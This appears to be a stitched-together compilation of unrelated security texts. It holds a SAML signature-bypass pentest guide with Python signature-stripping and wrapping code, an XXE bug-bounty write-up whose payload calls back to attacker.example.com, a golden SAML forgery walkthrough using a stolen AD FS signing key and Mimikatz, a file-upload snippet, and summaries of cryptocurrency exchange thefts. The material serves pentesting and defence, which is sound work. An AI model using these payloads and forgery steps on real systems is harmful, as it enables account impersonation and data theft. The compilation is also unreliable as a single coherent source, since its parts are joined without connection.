We’ve recently noticed a trend of many New Zealand sites, including many government services, wanting to implement Single Sign-On (SSO) to combat the proliferation of passwords. The most prevalent standard for doing this, providing interoperability between many vendors’ frameworks and multiple languages, is SAML 2.0. The usual mechanism for this passes the SAML response certifying the user’s identity through the web browser, using a signature to prevent tampering. Unfortunately, many SAML consumers don’t validate responses properly, allowing attacks up to and including full authentication bypass.
SAML 2.0 SSO
When signing in to a site with SAML 2.0, there are three parties involved – the Service Provider (‘SP’, the web application we want to access), the Principal (the user logging in) and the Identity Provider (‘IdP’, the authority). We want to accomplish the aim of getting the Identity Provider to tell the Service Provider, in a trustworthy way, who the Principal is.
We do this by having the Service Provider redirect our user to the Identity Provider with a SAML request. Once the Identity Provider is satisfied as to the user’s identity, they send them back to the Service Provider with a SAML response. There are three major ways of sending a message for web SSO, which the standard refers to as “bindings”:
- HTTP Redirect Binding. We include the SAML message directly in a URL.
- HTTP POST Binding. We include the SAML message in the body of a POST request.
- HTTP Artifact Binding. We send a random token, which acts as an identifier to retrieve the document via a back channel.
The first two of these can have some serious implementation issues.
Identifying SAML Responses
As described previously, SAML responses are generally passed either in the URL (the HTTP Redirect binding, as a SAMLResponse query parameter) or in the body of a POST request (the HTTP POST binding, as a SAMLResponse form field).
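As a rough sketch of how those two tamperable bindings package the message (the endpoint path and XML content here are invented, not from any real deployment), the Redirect binding DEFLATE-compresses and Base64-encodes the response before URL-encoding it into the query string, while the POST binding simply Base64-encodes it into a form field:

```python
import base64
import urllib.parse
import zlib

# Hypothetical response document; a real one is a full SAML <Response>
saml_response = b'<samlp:Response ID="_example">...</samlp:Response>'

# HTTP Redirect binding: raw DEFLATE, then Base64, then URL-encode
deflater = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 = raw DEFLATE, no zlib header
deflated = deflater.compress(saml_response) + deflater.flush()
redirect_param = urllib.parse.quote(base64.b64encode(deflated))
print("GET /saml/acs?SAMLResponse=" + redirect_param)

# HTTP POST binding: plain Base64 in a form field
post_param = base64.b64encode(saml_response).decode()
print("POST body: SAMLResponse=" + urllib.parse.quote(post_param))
```

Either form can be decoded, modified, and re-encoded by anyone sitting in the browser, which is exactly what the attacks below rely on.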
Both of these forms can be manipulated by an attacking user as they pass through the browser. If, on the other hand, you see a SAML Artifact (a short, opaque token), there’s probably not much you can do with it as an attacker. Artifacts are resolved into the original messages via a back channel, so unless you have access to the target’s private network (and likely an SSL/TLS implementation bug while you’re at it), they are pretty useless to an attacker.
Protecting Messages in Transit
The issue here is that in both the HTTP Redirect and HTTP POST bindings, the document from the IdP validating the user’s identity is passed through that user’s browser, and hence may be tampered with in transit. The HTTP Artifact Binding is immune to this particular issue.
If these messages lack any protections, an attacker could simply modify the response to, for example, claim to be somebody else. If I log in to the IdP as “Tim” then I could simply alter the response document to claim to be “Emmanuel” instead. In fact, I could just entirely forge the response, become Emmanuel, and impersonate him.
Of course, the authors of the standard aren’t lax enough to let that slip past them – they’ve tried very hard to fix this problem. The solution in the standard is to attach an XML Signature to each message, protecting that message against tampering.
The XML Signature Standard
The XML Signature standard is an immensely complicated beast, designed by a working group involving all the big names, and intended to be a one-size-fits-all solution to building tamper-resistant XML documents. Unfortunately, as is often the case, one-size-fits-all becomes the-only-size-fits-nobody.
In a normal application of digital signatures, we take a document to be signed, run it through a cryptographic hash function, and then apply a digital signature algorithm to the hash. If the document received is exactly identical, the signature will validate, whereas if even a single bit changes, the signature becomes invalid and the document is rejected.
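To make that concrete, here is a stdlib-only sketch of hash-then-sign, with an HMAC standing in for a real asymmetric signature algorithm (the key and documents are invented for illustration):

```python
import hashlib
import hmac

SIGNING_KEY = b"idp-signing-key"  # stand-in: real XML signatures use asymmetric keys

def sign(document: bytes) -> bytes:
    # Hash the whole document, then "sign" the digest.
    # HMAC stands in for RSA/ECDSA to keep this sketch stdlib-only.
    digest = hashlib.sha256(document).digest()
    return hmac.new(SIGNING_KEY, digest, hashlib.sha256).digest()

def verify(document: bytes, signature: bytes) -> bool:
    return hmac.compare_digest(sign(document), signature)

doc = b"subject=Tim"
sig = sign(doc)
print(verify(doc, sig))                   # True: document untouched
print(verify(b"subject=Emmanuel", sig))   # False: any change invalidates it
```

Because the signature covers the entire document, there is no question of *what* was signed; the XML Signature standard, as we’ll see, gives that guarantee away.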
Unfortunately, XML Signatures have one killer feature – the standard allows us to sign part of the document instead of the whole document, and embed the signature within the same document it’s supposed to be validating – so called inline signatures. The signatures do this by containing a “Reference” to the part of the document they sign, usually by referring to the “ID” attribute of an XML element, but in theory allowing anything in the XPath standard to be used as an expression. I can, in theory, write a signature anywhere within a document that refers to the “third to last <foo> element”, or equally vague expressions.
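For illustration (namespaces abbreviated and all values invented), an inline signature referring to its enclosing Assertion by ID looks roughly like this:

```xml
<!-- Illustrative sketch only, not a complete or valid signature -->
<saml:Assertion ID="_a75a1f2e">
  <ds:Signature>
    <ds:SignedInfo>
      <!-- "sign the element carrying this ID" -->
      <ds:Reference URI="#_a75a1f2e">
        <ds:Transforms>
          <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
        </ds:Transforms>
        <ds:DigestValue>...</ds:DigestValue>
      </ds:Reference>
    </ds:SignedInfo>
    <ds:SignatureValue>...</ds:SignatureValue>
  </ds:Signature>
  <saml:Subject>...</saml:Subject>
</saml:Assertion>
```

Note that nothing in the signature itself says “this must be the Assertion the SP consumes”; the Reference just points at an ID, wherever that ID happens to live.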
When validating an XML signature it’s not enough to ask the question “is this a valid signature from this signer?”. We also have to ask “is this signature present, referring to the right part of the document, applying all the right canonicalizations, from the expected signer AND valid?”. All too often, at least one of these checks is not implemented.
Getting Started with SAML Raider
While all the attacks described here can be carried out without many tools, SAML Raider, a Burp proxy plugin, is a useful tool for testing the common cases.
As described above, signatures can appear in various places within the SAML message and cover various parts of the message. By keeping the content of the message but adding new parts and modifying the structure of the remaining parts, we can craft messages that are still technically signed correctly, but may be interpreted by SAML libraries as having crucial parts signed when they are not.
Whenever the Service Provider is supposed to check something, there’s an opportunity for them to fail to do so or do so incorrectly, giving us an opportunity to bypass the signature. Enable Burp’s interception, capture the SAML request, and try these transformations. Each one should be done against a fresh, valid log-in attempt, as there is usually a nonce preventing us from replaying the same request repeatedly.
For repeated attempts, you may benefit from configuring Burp to intercept only the single SAML endpoint, using the proxy’s interception options.
Is a Signature Required?
The SAML standard requires that all messages passed through insecure channels, such as the user’s browser, be signed. However, messages that pass through secure channels, such as an SSL/TLS back channel, do not have to be. As a result of this, we’ve seen SAML consumers that validate any signature present, but silently skip validation if the signature is removed. The software is essentially presuming that someone has already checked that a message arriving over an insecure channel is signed, when this isn’t the case.
The impact of this is the ability to simply remove the signatures and tamper with the response as if it had never been signed. SAML Raider can test this one pretty easily.
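If you want to try this outside of SAML Raider, the transformation itself is trivial. A minimal stdlib sketch (the toy response below is invented; a real one carries many more elements):

```python
import xml.etree.ElementTree as ET

DSIG = "http://www.w3.org/2000/09/xmldsig#"

def strip_signatures(saml_xml: str) -> str:
    """Remove every ds:Signature element so we can test whether the
    SP still accepts (and now silently skips validating) the response."""
    root = ET.fromstring(saml_xml)
    for parent in list(root.iter()):
        for sig in parent.findall(f"{{{DSIG}}}Signature"):
            parent.remove(sig)
    return ET.tostring(root, encoding="unicode")

# Toy response, structure only
response = (
    '<Response xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    "<ds:Signature><ds:SignedInfo/></ds:Signature>"
    "<Assertion><Subject>Tim</Subject></Assertion>"
    "</Response>"
)
print(strip_signatures(response))
```

If the stripped response is still accepted, everything in it can now be tampered with freely.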
Is the Signature Validated?
Validating XML signatures is extremely complicated, as the standard expects a series of transformation and canonicalization steps to be applied first (e.g. to ignore the amount of white space). The difficulty of this makes it extremely hard to validate signatures without a fully featured XML Signature library behind you. The impacts of this are:
- Developers don’t generally understand the internals of signature validation.
- Intermediate tools, such as web application firewalls, have no idea whether signatures are valid or not.
- Libraries may have configurable options, such as lists of permitted canonicalization methods, which are meaningless to the developer.
The difficulty of implementing this standard, and the somewhat arcane nature of it, leads to the issues we will now look at.
First, testing whether the signature is validated at all is simple – change something in the supposedly signed content and see if it breaks.
Is the Signature From The Right Signer?
Another stumbling block is whether or not the receiver checks the identity of the signer. We haven’t seen this one done wrong, but SAML Raider will make this fairly easy to test.
Copy the certificate to SAML Raider’s certificate store.
Save and self-sign the certificate, so we have a self-signed copy of the same certificate.
Now we can re-sign the original request with our new certificate, either by signing the whole message or the assertion.
You could identify which of those two options is normally used by your recipient, or just try each of them.
Is the Correct Part of the Response Signed?
How XSW Attacks Work
The SAML standard allows signatures to appear in two places only:
- A signature within a <Response> tag, signing the Response tag and its descendants.
- A signature within an <Assertion> tag, signing the Assertion tag and its descendants.
The SAML standard is very specific about where signatures are allowed to be, and what they are allowed to refer to.
However, nobody implements XML signatures in all their gory complexity for use in SAML alone. The standard is generic, and so are the implementations and software libraries built for it. As a result, the separation of responsibilities looks like this:
- The XML Signature library validates according to the XML Signature standard, which allows anything to be signed from anywhere.
- The SAML library expects the XML Signature library to tell it whether or not the response is valid.
Somewhere in the middle of these two components, the rules about what we have to sign are often lost. As a result, we can often have our signature refer to a different part of the document, and still appear valid to the recipient.
By copying the signed parts of the document, and ensuring the signatures point to the copies, we can separate the part of the document that the XML Signature library checks from the part of the document that the SAML library consumes.
SAML Raider will automate the most common attacks of this form for you:
Try selecting each of those options from the drop-down, clicking “Apply XSW” and sending the request on. If this doesn’t cause an error, try doing it again and changing the username or other user identifier in each place it appears in the SAML XML.
Limitations of SAML Raider
While SAML Raider will test the common cases, there are a few attacks that require a deeper understanding:
- Producing a response that will validate against an XML schema (this requires hiding the shadow copy inside an element whose schema allows arbitrary content).
- Bypassing validation when both the Response and the Assertions within it are signed and checked.
- Bypassing XML signatures in non-SAML contexts, for example SOAP endpoints using WS-Security extensions.
If SAML Raider’s out-of-the-box options don’t work, you may want to try a manual approach:
- Decode the Base64-encoded content to access the SAML Response XML.
- Check that the signature’s <Reference> tag contains the ID of a signed element.
- Copy the signed content somewhere else in the document (often the end of the <Response> is OK; if XML Schema validation is in play, try to find somewhere to copy it that doesn’t break the schema).
- Remove the XML signature from the copy, leaving it in the original. This is necessary because the enveloped-signature transform excludes the signature being validated from the digest calculation. In the original document, that was the contained signature, so we have to cut it out of the copy.
- Change the ID of the original signed element to something different (e.g. change a letter).
- Change the content of the original assertion.
- Re-encode as Base64, put it back into the request and forward it on.
If the signature validation points to the copy, it will ignore your changes. With practice, you can complete this process pretty quickly if strict time limits on requests are in play.
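The manual steps above can be sketched in code. This is a toy, namespace-light model (element names simplified and IDs invented), not something a real SP would accept as-is:

```python
import base64
import copy
import xml.etree.ElementTree as ET

DSIG = "{http://www.w3.org/2000/09/xmldsig#}"

def xsw_transform(encoded_response: str, new_user: str) -> str:
    """Clone the signed Assertion, strip the clone's signature,
    re-ID the original and tamper with it."""
    root = ET.fromstring(base64.b64decode(encoded_response))
    assertion = root.find("Assertion")

    # Copy the signed content to the end of the Response...
    shadow = copy.deepcopy(assertion)
    # ...removing the signature from the copy (the enveloped-signature
    # transform excluded it from the digest when the original was signed)
    shadow.remove(shadow.find(f"{DSIG}Signature"))
    root.append(shadow)

    # Change the ID of the original so the Reference resolves to the copy
    assertion.set("ID", assertion.get("ID") + "_evil")
    # Tamper with the original, which the SAML library will consume
    assertion.find("Subject").text = new_user

    return base64.b64encode(ET.tostring(root)).decode()

toy = base64.b64encode(
    b'<Response><Assertion ID="_a1">'
    b'<Signature xmlns="http://www.w3.org/2000/09/xmldsig#"/>'
    b"<Subject>Tim</Subject></Assertion></Response>"
).decode()
print(xsw_transform(toy, "Emmanuel"))
```

After the transform, the signature’s Reference still resolves to an untouched copy carrying the original ID, while the tampered original is what a naive SAML library reads.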
SAML Pentest Checklist
- Does the SAML response pass through the web browser?
- Is it signed? If not, try changing the content.
- Is it accepted if we remove the signatures?
- Is it accepted if we re-sign it with a different certificate?
- Do any of the eight transforms baked into SAML Raider produce a result that is accepted?
- If you change such a response, is the modified response accepted?
- Might one of SAML Raider’s limitations noted above apply? If so, you may need to try a manual approach.
Finding vulnerabilities like XXE in bug bounty programs is awesome. I found an XXE bug in a private bug bounty program by converting a JSON request to an XML request, and it was awesome enough that I thought I’d share it with you all.
While fuzzing requests and responses, I encountered an API request that sent its body as JSON, as shown below:
For a valid request, the response was 204 No Content.
I am most comfortable with Burp Suite, so I downloaded the extension named “Content Type Converter“. This extension lets you convert a JSON request to XML, an XML request to JSON, or a normal form request to JSON, in order to play with requests and responses. (There are plenty of websites for this activity too, but using an extension is much more effective and comfortable.)
So, I modified the JSON request to XML and checked the response, as shown below:
The response was 204 No Content, which was unexpected: the same response code for both the JSON and XML requests. (I was very happy at that point.)
Obviously, my next step was to add an XXE payload and check for a callback on my attacker machine (a Kali instance hosted on Amazon).
Request with XXE payload
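The payload followed the classic out-of-band XXE pattern; roughly like this (the element names and callback host here are placeholders, not the actual request):

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://attacker.example.com/probe">
]>
<data>
  <name>&xxe;</name>
</data>
```

If the parser resolves external entities, the server makes an outbound request to the attacker-controlled host, confirming the vulnerability even when nothing is reflected in the response.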
Response on my Attacker machine:
Now, we can fetch internal server files over the HTTP or FTP protocol.
Stay tuned for further blog posts.
In this blog post, we introduce a new attack vector discovered by CyberArk Labs and dubbed “golden SAML.” The vector enables an attacker to create a golden SAML, which is basically a forged SAML “authentication object,” and authenticate across every service that uses SAML 2.0 protocol as an SSO mechanism.
In a golden SAML attack, attackers can gain access to any application that supports SAML authentication (e.g. Azure, AWS, vSphere, etc.) with any privileges they desire and be any user on the targeted application (even one that is non-existent in the application in some cases).
We are releasing a new tool that implements this attack – shimit.
In a time when more and more enterprise infrastructure is ported to the cloud, the Active Directory (AD) is no longer the highest authority for authenticating and authorizing users. AD can now be part of something bigger – a federation.
A federation enables trust between otherwise unrelated environments, such as Microsoft AD, Azure, AWS and many others. This trust allows a user in an AD, for example, to enjoy SSO benefits across all the trusted environments in such a federation. In a federation, an attacker need no longer stop at dominating the victim’s domain controller.
The golden SAML name may remind you of another notorious attack known as golden ticket, which was introduced by Benjamin Delpy who is known for his famous attack tool called Mimikatz. The name resemblance is intended, since the attack nature is rather similar. Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency.
For those of you who aren’t familiar with the SAML 2.0 protocol, we’ll take a minute to explain how it works.
The SAML protocol, or Security Assertion Markup Language, is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. Beyond what its name suggests, SAML is each of the following:
- An XML-based markup language (for assertions, etc.)
- A set of XML-based protocol messages
- A set of protocol message bindings
- A set of profiles (utilizing all of the above)
The single most important use case that SAML addresses is web browser single sign-on (SSO). [Wikipedia]
Let’s take a look at figure 1 in order to understand how this protocol works.
Figure 1- SAML Authentication
- First, the user tries to access an application (also known as the SP, i.e. Service Provider), which might be an AWS console, vSphere web client, etc. Depending on the implementation, the client may go directly to the IdP first, skipping the first step in this diagram.
- The application then detects the IdP (i.e. Identity Provider, could be AD FS, Okta, etc.) to authenticate the user, generates a SAML AuthnRequest and redirects the client to the IdP.
- The IdP authenticates the user, creates a SAMLResponse and posts it to the SP via the user.
- SP checks the SAMLResponse and logs the user in. The SP must have a trust relationship with the IdP. The user can now use the service.
SAML Response Structure
Talking about a golden SAML attack, the part that interests us the most is #3, since this is the part we are going to replicate as attackers performing this kind of attack. To be able to do this correctly, let’s have a look at the message that is sent in this part: the SAMLResponse. The SAMLResponse object is what the IdP sends to the SP, and this is the data that makes the SP identify and authenticate the user (similar to a TGT generated by a KDC in Kerberos). In SAML 2.0, a SAMLResponse is a Response element wrapping one or more Assertions, with dynamic parameters such as the IDs, timestamps, issuer, subject and attributes.
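A rough skeleton of that structure, with namespaces and most attributes elided and “...” marking the dynamic parameters, looks something like this:

```xml
<samlp:Response ID="..." InResponseTo="..." IssueInstant="...">
  <saml:Issuer>IdP name</saml:Issuer>
  <samlp:Status>...</samlp:Status>
  <saml:Assertion ID="..." IssueInstant="...">
    <ds:Signature>...</ds:Signature>
    <saml:Subject>
      <saml:NameID>username</saml:NameID>
    </saml:Subject>
    <saml:Conditions NotBefore="..." NotOnOrAfter="...">...</saml:Conditions>
    <saml:AuthnStatement>...</saml:AuthnStatement>
    <saml:AttributeStatement>roles, permissions, etc.</saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
```

Every one of those dynamic values is under the attacker’s control in a golden SAML attack, provided they can produce a valid signature.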
Depending on the specific IdP implementation, the response assertion may be either signed or encrypted by the private key of the IdP. This way, the SP can verify that the SAMLResponse was indeed created by the trusted IdP.
Similar to a golden ticket attack, if we have the key that signs the object which holds the user’s identity and permissions (KRBTGT for golden ticket and token-signing private key for golden SAML), we can then forge such an “authentication object” (TGT or SAMLResponse) and impersonate any user to gain unauthorized access to the SP. Roger Grimes defined a golden ticket attack back in 2014 not as a Kerberos tickets forging attack, but as a Kerberos Key Distribution Center (KDC) forging attack. Likewise, a golden SAML attack can also be defined as an IdP forging attack.
In this attack, an attacker can control every aspect of the SAMLResponse object (e.g. username, permission set, validity period and more). In addition, golden SAMLs have the following advantages:
- They can be generated from practically anywhere. You don’t need to be a part of the domain, federation or any other environment you’re dealing with
- They are effective even when 2FA is enabled
- The token-signing private key is not renewed automatically
- Changing a user’s password won’t affect the generated SAML
AWS + AD FS + Golden SAML = ♥ (case study)
Let’s say you are an attacker. You have compromised your target’s domain, and you are now trying to figure out how to continue your hunt for the final goal. What’s next? One option that is now available for you is using a golden SAML to further compromise assets of your target.
Active Directory Federation Services (AD FS) is a Microsoft standards-based domain service that allows the secure sharing of identity information between trusted business partners (federation). It is basically a service in a domain that provides domain user identities to other service providers within a federation.
Assuming AWS trusts the domain which you’ve compromised (in a federation), you can then take advantage of this attack and practically gain any permissions in the cloud environment. To perform this attack, you’ll need the private key that signs the SAML objects (similar to the need for the KRBTGT key in a golden ticket). For this private key, you don’t need domain admin access; you’ll only need the AD FS user account.
Here’s a list of the requirements for performing a golden SAML attack:
- Token-signing private key
- IdP public certificate
- IdP name
- Role name (role to assume)
- Role session name in AWS
- Amazon account ID
Only some of these requirements are mandatory; for the other, non-mandatory fields, you can enter whatever you like.
How do you get these requirements? For the private key you’ll need access to the AD FS account, and from its personal certificate store you’ll need to export the private key (the export can be done with tools like Mimikatz). For the other requirements, you can import the PowerShell snap-in Microsoft.Adfs.Powershell and query AD FS directly (you have to be running as the AD FS user).
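For example, with the snap-in loaded, the token-signing certificate details and the IdP name can be pulled roughly like this (these are standard AD FS cmdlets; exact output varies by version):

```powershell
# Load the AD FS snap-in (run as the AD FS service account)
Add-PSSnapin Microsoft.Adfs.Powershell

# Token-signing certificate (the IdP public certificate)
Get-ADFSCertificate -CertificateType "Token-Signing"

# IdP name (the federation service identifier)
Get-ADFSProperties | Select-Object Identifier
```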
ADFS Public Certificate
Once we have what we need, we can jump straight into the attack. First, let’s check if we have any valid AWS credentials on our machine.
Unsurprisingly, we have no credentials, but that’s about to change. Now, let’s use shimit to generate and sign a SAMLResponse.
The operation of the tool is as follows:
Figure 2– Golden SAML with shimit.py
- Generate an assertion matching the parameters provided by the user. In this example, we provided the username, Amazon account ID and the desired roles (the first one will be assumed).
- Sign the assertion with the private key file, also specified by the user.
- Open a connection to the SP and call the AWS AssumeRoleWithSAML API.
- Get an access key and a session token from AWS STS (the service that supplies temporary credentials for federated users).
- Apply this session to the command line environment (using aws-cli environment variables) for the user to use with AWS cli.
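As a stdlib-only illustration of step 1 (this is not shimit’s actual code; real assertions carry namespaces, audience restrictions and a signature, all omitted here), building the unsigned skeleton might look like:

```python
import datetime
import xml.etree.ElementTree as ET

def build_assertion(username: str, account_id: str, role: str,
                    validity_minutes: int = 5) -> bytes:
    """Heavily simplified, unsigned assertion skeleton: subject,
    validity window, and the AWS role attribute."""
    now = datetime.datetime.now(datetime.timezone.utc)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    assertion = ET.Element("Assertion", IssueInstant=now.strftime(fmt))
    subject = ET.SubElement(assertion, "Subject")
    ET.SubElement(subject, "NameID").text = username
    ET.SubElement(
        assertion, "Conditions",
        NotBefore=now.strftime(fmt),
        NotOnOrAfter=(now + datetime.timedelta(minutes=validity_minutes)).strftime(fmt),
    )
    attrs = ET.SubElement(assertion, "AttributeStatement")
    role_attr = ET.SubElement(attrs, "Attribute", Name="Role")
    # Real AWS role ARN format; the account and role values are made up
    ET.SubElement(role_attr, "AttributeValue").text = (
        f"arn:aws:iam::{account_id}:role/{role}")
    return ET.tostring(assertion)

print(build_assertion("admin", "123456789012", "Admin"))
```

Signing this skeleton with the stolen token-signing key (step 2) is what turns it into a golden SAML.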
Performing a golden SAML attack in this environment has a limitation. Even though we can generate a SAMLResponse that will be valid for any time period we choose (using the --SamlValidity flag), AWS specifically checks whether the response was generated more than five minutes ago, and if so, it won’t authenticate the user. This check is performed on the server, on top of the normal test that verifies the response has not expired.
This attack doesn’t rely on a vulnerability in SAML 2.0. It’s not a vulnerability in AWS/ADFS, nor in any other service or identity provider.
Golden ticket is not treated as a vulnerability because an attacker has to have domain admin access in order to perform it, which is why it is not being addressed by the relevant vendors. The fact of the matter is, attackers are still able to gain this type of access (domain admin), and they are still using golden tickets to maintain stealthy persistence, for years even, in their targets’ domains.
Golden SAML is rather similar. It’s not a vulnerability per se, but it gives attackers the ability to gain unauthorized access to any service in a federation (assuming it uses SAML, of course) with any privileges and to stay persistent in this environment in a stealthy manner.
As for the defenders, we know that if this attack is performed correctly, it will be extremely difficult to detect in your network. Moreover, according to the ‘assume breach’ paradigm, attackers will probably target the most valuable assets in the organization (DC, AD FS or any other IdP). That’s why we recommend better monitoring and managing access for the AD FS account (for the environment mentioned here), and if possible, auto-rollover the signing private key periodically, making it difficult for the attackers.
In addition, implementing an endpoint security solution, focused around privilege management, like CyberArk’s Endpoint Privilege Manager, will be extremely beneficial in blocking attackers from getting their hands on important assets like the token-signing certificate in the first place.
Often, when you write the code responsible for file uploads, you check the extension of the uploaded file using a “whitelist” (only files with certain extensions can be uploaded) or a “blacklist” (any file whose extension is not on the list can be uploaded).
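A minimal whitelist check might look like this (the extension list is just an example):

```python
import os

ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}  # example whitelist

def is_allowed(filename: str) -> bool:
    """Whitelist check: only explicitly permitted extensions pass.
    A blacklist would instead reject known-bad extensions (.php, .jsp, ...)
    and let everything else through, which is why it is the weaker approach."""
    _, ext = os.path.splitext(filename.lower())
    return ext in ALLOWED_EXTENSIONS

print(is_allowed("report.pdf"))     # True
print(is_allowed("shell.php"))      # False
print(is_allowed("shell.php.gif"))  # True: double extensions still need care
```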
Bancor posted early details of an investigation into a security breach regarding a smart contract. A wallet used to upgrade smart contracts was used to steal somewhere in the range of $23M. Some amount of this was mitigated by protocol level features that allow the freezing of BNT tokens.
A wallet used to upgrade some smart contracts was compromised. This compromised wallet was then used to withdraw ETH from the BNT smart contract in the amount of 24,984 ETH ($12.5M). The same wallet also stole 229,356,645 NPXS (~$1M) and 3,200,000 BNT (~$10M).
Note: charting as “unknown” until the method used to compromise the wallet is described.
On June 10, there was a system check due to the hacking attempt at dawn. At present, we have confirmed that 70% of Coinrail’s total coin/token reserves are safely stored and have been moved to a cold wallet. About 80% of the coins confirmed to have been leaked have been frozen/withdrawn/redeemed or the equivalent, in consultation with the related exchanges, while the remainder is under investigation with investigators, related exchanges and coin developers.
Interestingly, South Korean Law Enforcement worked pretty quickly to help contain the issue with maintainers of the coins that had theft.
This is Bithumb’s second appearance in the graveyard. 35 billion Korean won (around $31 million) is estimated to have been stolen, and data about root cause is sparse.
Taylor is described as a “smart cryptocurrency trading assistant” which allows people to day trade cryptocurrency.
Today we arrived at the office and found out that we’ve been hacked and all of our funds have been stolen. Not only the balance in ETH (2,578.98 ETH), but also the TAY tokens from the Team and Bounty pools.
Several write-ups from their executives shed light on the incident (1, 2, 3). The root cause appears to be the theft of a 1Password file. It is not clear how the file was accessed, how the hacker was positioned to view it, or whether it contained cryptographic secrets or infrastructure secrets.
Somehow the hacker got access to one of our devices and took control of one of our 1Password files.
The following is also interesting:
Although we are all aware of the good practices, we confess that we may have neglected some very important details — we know that the devil is in the details.
As far as we know, the hacker is same person/group that supposedly hacked CypheriumChain (more than 17,000 ETH were stolen).
The hacker collected the amount from multiple sources in a single wallet, then transferred it to a bigger one.
What we can say is that it was not a smart contract exploit.
A failed cold storage restoration exercise seems to have exposed private keys intended for offline storage (effectively making them online). However, the CEO has suggested an insider’s involvement. Police found the private keys had been exposed online for more than 12 hours.
Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys.
This is one of the harder breaches to decipher, as there are a lot of conspiracy articles and accusations by all parties involved. Underlying the Bitgrail breach seems to be some kind of application error, as opposed to a fully hijacked wallet, but there isn’t a lot of certainty here. The Nano core team (developers of the currency involved) announced their suspicion of the exchange and its claims.
We now have sufficient reason to believe that Firano has been misleading the Nano Core Team and the community regarding the solvency of the BitGrail exchange for a significant period of time.
However, the Bitgrail accusations have pointed towards a thief, and blockchain viewing software developed by Nano.
BitGrail Srl once again confirms that it was the victim of a theft, which took advantage of malfunctions of the software made available by the NANO team (rai_node and official block explorer) and, therefore, also for these reasons and according to the law, is not absolutely responsible, for any reason, of the incident.
Coincheck is a Japanese exchange that works with multiple blockchains, including NEM. Around January 26, 2018, XEM valued at approximately $400m USD were stolen. Initial cause was unclear to Coincheck according to their statements.
After hours of speculation Friday night, Coincheck Inc. said the coins were sent “illicitly” outside the venue. Co-founder Yusuke Otsuka said the company didn’t know how the 500 million tokens went missing, and the firm is working to ensure the safety of all client assets. Coincheck said earlier it had suspended all withdrawals, halted trading in all tokens except Bitcoin, and stopped deposits into NEM coins.
According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds.
BlackWallet is a wallet used to send and receive Lumens (XLM) on the Stellar network. The creator of BlackWallet announced on Reddit an infrastructure compromise resulting in a hacked website that attacked users who entered private keys into it. It should be noted that BlackWallet was not in possession of user private keys; it was more of a wallet client that could be used to view a wallet.
BlackWallet appears to have existed since August 2017, with a DNS hijack on January 13 pointing traffic towards Cloudflare and a malicious browser-based wallet. BlackWallet only existed for five months before being victimized.
I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of its fraudulent website (which was a copy of blackwallet).
Youbit was hacked on December 19th at 4:35 am. They had previously been breached earlier in the year, with South Korean officials indicating North Korean involvement. Their hot wallet, containing 17% of their assets, was breached and stolen, indicating that cold storage was useful. Assuming a server breach of some kind.
After the accident in April, we did our best to improve security, recruitment and system maintenance, and managed to lower the hot wallet rate. Then, at 4:35 am, we lost our hot wallet to hacking.
- The coins lost at 4:35 am amount to about 17% of total assets. The other coins were kept in the cold wallet and there were no additional losses.
- The loss ratio is low compared to last April, but the management of Yaffian Co., Ltd. will proceed with stopping transactions, deposits and withdrawals, and filing for bankruptcy, on December 19, 2017.
- Accordingly, all coin and cash deposits and withdrawals will be suspended at 12:00 pm on December 19, 2017.
- Due to the bankruptcy, the settlement of cash and coins will be carried out in accordance with all bankruptcy procedures.
- However, in order to minimize the damage to our members, we will arrange for the withdrawal of approximately 75% of balances at 4:00 am on December 19. The remaining unpaid portion will be paid after the final settlement is completed.
- We will do our best to minimize our members’ losses (about 17%) through various methods, such as comprehensive cyber insurance (3 billion won) and selling the operating rights of the company.
- After the announcement date, your assets will be adjusted to 75% at 4:00 pm on December 19, 2017. Cash and coins deposited after 4:00 pm will be 100% refunded.
Nicehash was a cryptocurrency mining service and marketplace, allowing users to buy and sell their own mining power. While not necessarily a mining pool of its own, it still maintained a wallet for customer funds. Nicehash appears to have shuttered their website with a notice saying “a security breach involving NiceHash website” and “our payment system was compromised and the contents of the NiceHash Bitcoin wallet have been stolen”.
A Facebook livestream has further notes on the issue. This is hard to archive, so I will transcribe the useful points. Overall, this was lateral movement from a remote IP address, gaining access to a VPN, possibly through an employee computer, and moving laterally into production systems. This all appears to have happened within a couple of hours, once the attacker decided to work actively.
- “We became a target and someone really wanted to bring us down.”
- “We are cooperating with local and international law enforcement”.
- ~4700 BTC stolen on early morning 12-06-2017
- Can’t discuss everything due to investigation.
- Hacker(s) were able to infiltrate our internal systems through a compromised company computer.
- Unknown how company computer was compromised.
- VPN had visibility into abusive behavior, IP address was outside of European Union.
- “Made a crucial VPN login using an engineer’s credentials”
- After VPN login, learned and simulated the workings of our payment system.
- Managed to steal funds from accounts (indicates that the active attack timeline was only a couple hours)
Tether lost $31 million in “tokens”. Tether tokens allow you to “store, send and receive digital tokens pegged to dollars, euros, and yen person-to-person, globally”. Based on wording in Tether blog posts, a “treasury wallet” was drained by an external attacker. This implies that some sort of key material or signature-generating process was misused, so I estimate this ultimately required the breach of a high-risk server. This estimation is low confidence and could change with new information, for instance, if the treasury wallet was cold, or held on a compromised endpoint by an employee. Remote access requires some degree of wallet “warmth”, which makes me believe it was online on a server. The Tether team claims high confidence in identifying their root cause, so this is not an “unknown” root cause.
On Sunday, November 19th, $30,950,010.00 in Tether tokens were stolen from our treasury wallet through malicious action by an external attacker. While we are in the process of co-ordinating and co-operating with law enforcement on this matter, we are satisfied that we have found the cause of the breach of Tether’s systems. We are taking measures to recover the Tethers and are migrating the platform to a new infrastructure. More information about our initial response to this breach is here.
CoinDash appears to have been victimized by a hacked website, on which an adversary swapped out a funding address for a malicious address immediately after the token sale launched.
